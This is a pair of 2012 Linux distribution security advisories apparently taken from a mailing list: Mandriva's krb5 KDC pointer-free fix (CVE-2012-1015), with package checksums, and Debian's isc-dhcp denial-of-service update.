-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:111 http://www.mandriva.com/security/ ___ Package : krb5 Date: August 1, 2012 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in krb5: The MIT krb5 KDC (Key Distribution Center) daemon can free an uninitialized pointer while processing an unusual AS-REQ, corrupting the process heap and possibly causing the daemon to abnormally terminate. An attacker could use this vulnerability to execute malicious code, but exploiting frees of uninitialized pointers to execute code is believed to be difficult. It is possible that a legitimate client that is misconfigured in an unusual way could trigger this vulnerability (CVE-2012-1015). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1015 ___ Updated Packages: Mandriva Linux 2011: c97ac6f4bc0136d3d7e47a8328726b3b 2011/i586/krb5-1.9.1-1.4-mdv2011.0.i586.rpm d2aef21ae4f4e579a8717332aa13e20e 2011/i586/krb5-pkinit-openssl-1.9.1-1.4-mdv2011.0.i586.rpm f9380168b619b05c77c6d8b9aa7c581f 2011/i586/krb5-server-1.9.1-1.4-mdv2011.0.i586.rpm 69b4e94c345c9ed8ef3dd89e35e67164 2011/i586/krb5-server-ldap-1.9.1-1.4-mdv2011.0.i586.rpm effc40635d93060f82ac29cbc517414a 2011/i586/krb5-workstation-1.9.1-1.4-mdv2011.0.i586.rpm 7867ccdef0b0be42702e8560923c905d 2011/i586/libkrb53-1.9.1-1.4-mdv2011.0.i586.rpm 45bd32260bb048b10b609e6a83030225 2011/i586/libkrb53-devel-1.9.1-1.4-mdv2011.0.i586.rpm 4c288a562b56030e022dffc7f05cf085 2011/SRPMS/krb5-1.9.1-1.4.src.rpm Mandriva Linux 2011/X86_64: f39033dba0f8e17fb159a9defb0c1d30 2011/x86_64/krb5-1.9.1-1.4-mdv2011.0.x86_64.rpm 12c880bbe5ddc79d0198718cb9213af8 2011/x86_64/krb5-pkinit-openssl-1.9.1-1.4-mdv2011.0.x86_64.rpm 92da383bb2aba80cfa1b8c1711815b28 2011/x86_64/krb5-server-1.9.1-1.4-mdv2011.0.x86_64.rpm c9d3c5a836944fcd2618f8d2f39b9952 2011/x86_64/krb5-server-ldap-1.9.1-1.4-mdv2011.0.x86_64.rpm 70067964b4771220cc817312811761c7 2011/x86_64/krb5-workstation-1.9.1-1.4-mdv2011.0.x86_64.rpm 9b4a4a94492b1402e0703fe581268d4c 2011/x86_64/lib64krb53-1.9.1-1.4-mdv2011.0.x86_64.rpm 4ca7c65a9a93ddabf26302800531c43e 2011/x86_64/lib64krb53-devel-1.9.1-1.4-mdv2011.0.x86_64.rpm 4c288a562b56030e022dffc7f05cf085 2011/SRPMS/krb5-1.9.1-1.4.src.rpm Mandriva Enterprise Server 5: d2805127734cfc9fa44d63eb1dcdd069 mes5/i586/krb5-1.8.1-0.9mdvmes5.2.i586.rpm 1b64fce78bfad7e75d6e3a4a6a88c933 mes5/i586/krb5-pkinit-openssl-1.8.1-0.9mdvmes5.2.i586.rpm 21d0f0de422ef8d4c98fad788e06ba84 mes5/i586/krb5-server-1.8.1-0.9mdvmes5.2.i586.rpm e4ab86d99061868402ac91c846b8fd32 mes5/i586/krb5-server-ldap-1.8.1-0.9mdvmes5.2.i586.rpm f6dce68d50ac7cf9f94593cd71666e77 mes5/i586/krb5-workstation-1.8.1-0.9mdvmes5.2.i586.rpm 886fb345779a8ad2c9699cd0cd012cf8 mes5/i586/libkrb53-1.8.1-0.9mdvmes5.2.i586.rpm 20b58f868a943cdc5b824341e1cad72f mes5/i586/libkrb53-devel-1.8.1-0.9mdvmes5.2.i586.rpm c068435186c7e2c946260c5b4e656626 mes5/SRPMS/krb5-1.8.1-0.9mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1689053182459865f534fa50a3fd73cb mes5/x86_64/krb5-1.8.1-0.9mdvmes5.2.x86_64.rpm 190a1887fec26114c228a22fdc01a88b mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.9mdvmes5.2.x86_64.rpm 6aa504edffa628c61ef34bf7bdfe260a mes5/x86_64/krb5-server-1.8.1-0.9mdvmes5.2.x86_64.rpm 3cdc1c5a9ed45f60331b0798457d5da7 mes5/x86_64/krb5-server-ldap-1.8.1-0.9mdvmes5.2.x86_64.rpm e0c16639fffaeb988454607edf5a8bee mes5/x86_64/krb5-workstation-1.8.1-0.9mdvmes5.2.x86_64.rpm 8701473a6a48616933c58af2a530a236 mes5/x86_64/lib64krb53-1.8.1-0.9mdvmes5.2.x86_64.rpm 8f1035e2b966c411a216c4ff8b704569 mes5/x86_64/lib64krb53-devel-1.8.1-0.9mdvmes5.2.x86_64.rpm c068435186c7e2c946260c5b4e656626 mes5/SRPMS/krb5-1.8.1-0.9mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID
[SECURITY] [DSA 2519-1] isc-dhcp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2519-1 secur...@debian.org http://www.debian.org/security/Nico Golde August 1, 2012 http://www.debian.org/security/faq - - Package: isc-dhcp Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954 Several security vulnerabilities affecting ISC dhcpd, a server for automatic IP address assignment, have been discovered. Additionally, the latest security update for isc-dhcp, DSA-2516-1, did not properly apply the patches for CVE-2012-3571 and CVE-2012-3954. This has been addressed in this additional update. CVE-2011-4539 BlueCat Networks discovered that it is possible to crash DHCP servers configured to evaluate requests with regular expressions via crafted DHCP request packets. CVE-2012-3571 Markus Hietava of the Codenomicon CROSS project discovered that it is possible to force the server to enter an infinite loop via messages with malformed client identifiers. CVE-2012-3954 Glen Eustace discovered that DHCP servers running in DHCPv6 mode and possibly DHCPv4 mode suffer of memory leaks while processing messages. An attacker can use this flaw to exhaust resources and perform denial of service attacks. For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze5. For the testing (wheezy) and unstable (sid) distributions, this problem will be fixed soon. We recommend that you upgrade your isc-dhcp packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlAZdqMACgkQHYflSXNkfP9JTACgqRtw/5/jPQwJWt1lUnvTDs1H Ha0AoKSoDWGdA4LIXa9UbFVG7/0vdksV =EVNR -END PGP SIGNATURE-
